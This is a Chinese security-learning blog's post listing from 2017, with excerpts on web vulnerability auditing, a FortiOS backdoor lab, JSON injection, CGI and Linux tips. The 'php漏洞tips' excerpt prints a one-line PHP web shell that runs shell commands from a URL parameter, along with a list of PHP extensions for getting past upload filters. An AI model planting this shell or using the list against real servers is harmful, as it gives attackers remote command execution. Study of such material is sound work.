studyskill - 博客园

2017年3月14日

摘要：阅读全文

posted @ 2017-03-14 11:33 studyskill 阅读(310) 评论(0) 推荐(0) 编辑

摘要：通过该文学习一下常见硬件web漏洞。重点关注一下几个方面： 1.登录验证代码； 2.文件上传代码； 3.system/exec/popen等是否存在注入可能； 4.调用二进制文件； 5.未登陆可以访问的url; 6.sql相关处理转：https://www.exploitee.rs/index.p 阅读全文

posted @ 2017-03-14 09:30 studyskill 阅读(752) 评论(0) 推荐(0) 编辑

2017年3月13日

转：fortios 5.4后门植入

摘要：提示： 1.经过实验，fortios 5.4 beta4也是可以的。 2.在实验时，选择先下载fortios 5.2(做了快照),再升级5.4，则虚拟机挂载需要选择FortiGate-VM-disk1-000001.vmdk 3.将fortios虚拟机重新打开时，会遇到硬盘id不匹配的问题，只需要修阅读全文

posted @ 2017-03-13 09:01 studyskill 阅读(8178) 评论(0) 推荐(0) 编辑

2017年3月9日

资料收集-2

该文被密码保护。阅读全文

posted @ 2017-03-09 10:53 studyskill 阅读(3) 评论(0) 推荐(0) 编辑

转：json注入

摘要：现在大部分web采用ajax通信，数据表现为json格式，因此可以尝试进行json注入。 json注入:根据实际情况进行注入。有的时候，可能是为了方便，有人会手动拼接下JSON，但是这种随手代码，却可能带来意想不到的安全隐患。第一种方式，利用字符串拼接：String user = "test01"; 阅读全文

posted @ 2017-03-09 10:39 studyskill 阅读(4120) 评论(0) 推荐(0) 编辑

linux tips

摘要： 1.gdb如何调试没有符号表(未加-g选项的编译)的程序disassemble main 2.kali中zip使用 zip -r archive_name.zip directory_to_compress 下面是如果解压一个zip文档: # unzip archive_name.zip 2.反编译阅读全文

posted @ 2017-03-09 10:36 studyskill 阅读(207) 评论(0) 推荐(0) 编辑

资料收集

摘要：工具 https://www.ctftools.com/down/ Fuzzing Apache httpd server with American Fuzzy Lop + persistent mode https://sensepost.com/blog/2017/fuzzing-apache 阅读全文

posted @ 2017-03-09 10:35 studyskill 阅读(282) 评论(0) 推荐(0) 编辑

转：nginx+CGI/FASTCGI

摘要：简介版： 1.fastcgi与cgi区别：fastcgi通过线程来响应请求，而cgi对每个请求生成一个进程。 2.典型nginx数据传输过程：user->nginx->本地socket(请求传输)->fastcgi(即进程管理器)->cgi进程。转（感谢下面两位同学）： http://blog.c 阅读全文

posted @ 2017-03-09 10:00 studyskill 阅读(4994) 评论(0) 推荐(1) 编辑

转：python cgi编程

摘要：转：http://www.runoob.com/Python/python-cgi.html 什么是CGI CGI 目前由NCSA维护，NCSA定义CGI如下： CGI(Common Gateway Interface),通用网关接口,它是一段程序,运行在服务器上如：HTTP服务器，提供同客户端HT 阅读全文

posted @ 2017-03-09 09:54 studyskill 阅读(279) 评论(0) 推荐(0) 编辑

php漏洞tips

摘要： 1.php后缀限制 'php,php3,php4,php5,php6,php7,phpsh,inc,phtml','PHT'; 2.php木马 <?php echo shell_exec($_GET['cmd']); ?> 阅读全文

posted @ 2017-03-09 09:53 studyskill 阅读(150) 评论(0) 推荐(0) 编辑